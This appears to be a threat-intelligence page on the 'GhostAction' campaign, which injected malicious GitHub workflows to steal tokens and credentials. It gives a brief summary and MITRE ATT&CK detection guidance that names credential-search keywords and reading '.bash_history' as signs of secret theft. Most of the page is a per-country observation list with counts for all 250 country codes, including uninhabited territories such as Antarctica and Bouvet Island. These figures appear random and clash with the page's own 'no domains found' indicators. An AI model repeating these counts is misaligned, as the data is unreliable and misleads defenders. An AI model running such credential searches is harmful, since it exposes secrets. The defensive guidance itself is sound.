Campaigns
Ghost Action: The Silent Workflow Heist

Ghost Action: The Silent Workflow Heist

GhostActionSupplyChainAttackGitHubSecurity
The GhostAction campaign targeted GitHub workflows to steal sensitive data. Attackers injected malicious workflows into public repositories, which then exfiltrated credentials and tokens to attacker-controlled servers. The incident compromised hundreds of repositories and exposed thousands of secrets, including API keys, package manager tokens, and cloud access credentials.

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

T1190 – Exploit Public-Facing Application

ID Data Source Data Component Detects
DS0015 Application Log Application Log Content Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation. Web server logs (e.g., var/log/httpd or /var/log/apache for Apache web servers on Linux) may also record evidence of exploitation.
DS0029 Network Traffic Network Traffic Content Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads. For example, monitor for successively chained functions that adversaries commonly abuse (i.e. gadget chaining) through unsafe deserialization to exploit publicly facing applications for initial access. [114] In AWS environments, monitor VPC flow logs and/or Elastic Load Balancer (ELB) logs going to and from instances hosting externally accessible applications.

T1552-Unsecured Credentials

ID Data Source Data Component Detects
DS0015 Application Log Application Log Content Monitor application logs for activity that may highlight malicious attempts to access application data, especially abnormal search activity targeting passwords and other artifacts related to credentials. [12]
DS0017 Command Command Execution While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information.
DS0022 File File Access Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history .
DS0009 Process Process Creation Monitor newly executed processes that may search compromised systems to find and obtain insecurely stored credentials.

Observed Countries250

AD (454)
AE (596)
AF (189)
AG (590)
AI (157)
AL (421)
AM (96)
AO (114)
AQ (54)
AR (451)
AS (672)
AT (470)
AU (213)
AW (487)
AX (10)
AZ (319)
BA (620)
BB (109)
BD (301)
BE (708)
BF (282)
BG (898)
BH (121)
BI (922)
BJ (935)
BL (440)
BM (481)
BN (734)
BO (846)
BQ (778)
BR (854)
BS (926)
BT (852)
BV (666)
BW (274)
BY (540)
BZ (833)
CA (66)
CC (129)
CD (40)
CF (966)
CG (711)
CH (123)
CI (73)
CK (684)
CL (186)
CM (856)
CN (66)
CO (629)
CR (735)
CU (437)
CV (902)
CW (844)
CX (463)
CY (115)
CZ (539)
DE (935)
DJ (775)
DK (100)
DM (270)
DO (630)
DZ (942)
EC (505)
EE (93)
EG (380)
EH (718)
ER (358)
ES (180)
ET (59)
FI (967)
FJ (938)
FK (666)
FM (448)
FO (249)
FR (750)
GA (864)
GB (758)
GD (52)
GE (584)
GF (272)
GG (599)
GH (715)
GI (616)
GL (934)
GM (181)
GN (183)
GP (238)
GQ (508)
GR (624)
GS (252)
GT (392)
GU (560)
GW (927)
GY (874)
HK (624)
HM (874)
HN (367)
HR (158)
HT (558)
HU (703)
ID (599)
IE (582)
IL (671)
IM (59)
IN (158)
IO (823)
IQ (630)
IR (208)
IS (499)
IT (191)
JE (160)
JM (824)
JO (490)
JP (160)
KE (928)
KG (397)
KH (128)
KI (784)
KM (995)
KN (758)
KP (706)
KR (486)
KW (862)
KY (468)
KZ (18)
LA (21)
LB (384)
LC (400)
LI (437)
LK (334)
LR (825)
LS (73)
LT (147)
LU (381)
LV (950)
LY (921)
MA (585)
MC (658)
MD (255)
ME (362)
MF (48)
MG (738)
MH (611)
MK (645)
ML (660)
MM (420)
MN (853)
MO (702)
MP (944)
MQ (347)
MR (151)
MS (269)
MT (654)
MU (415)
MV (633)
MW (48)
MX (102)
MY (134)
MZ (504)
NA (537)
NC (567)
NE (116)
NF (776)
NG (548)
NI (511)
NL (649)
NO (7)
NP (636)
NR (37)
NU (642)
NZ (656)
OM (494)
PA (349)
PE (617)
PF (812)
PG (321)
PH (937)
PK (271)
PL (441)
PM (867)
PN (294)
PR (367)
PS (5)
PT (98)
PW (877)
PY (5)
QA (209)
RE (458)
RO (318)
RS (166)
RU (992)
RW (656)
SA (500)
SB (410)
SC (260)
SD (120)
SE (308)
SG (887)
SH (839)
SI (514)
SJ (701)
SK (904)
SL (290)
SM (705)
SN (456)
SO (878)
SR (891)
SS (35)
ST (420)
SV (707)
SX (95)
SY (842)
SZ (547)
TC (907)
TD (121)
TF (824)
TG (267)
TH (725)
TJ (779)
TK (43)
TL (653)
TM (14)
TN (638)
TO (627)
TR (657)
TT (461)
TV (519)
TW (665)
TZ (371)
UA (834)
UG (222)
UM (125)
US (399)
UY (640)
UZ (804)
VA (63)
VC (623)
VE (573)
VG (326)
VI (965)
VN (889)
VU (234)
WF (777)
WS (886)
XK (921)
YE (343)
YT (884)
ZA (637)
ZM (473)
ZW (816)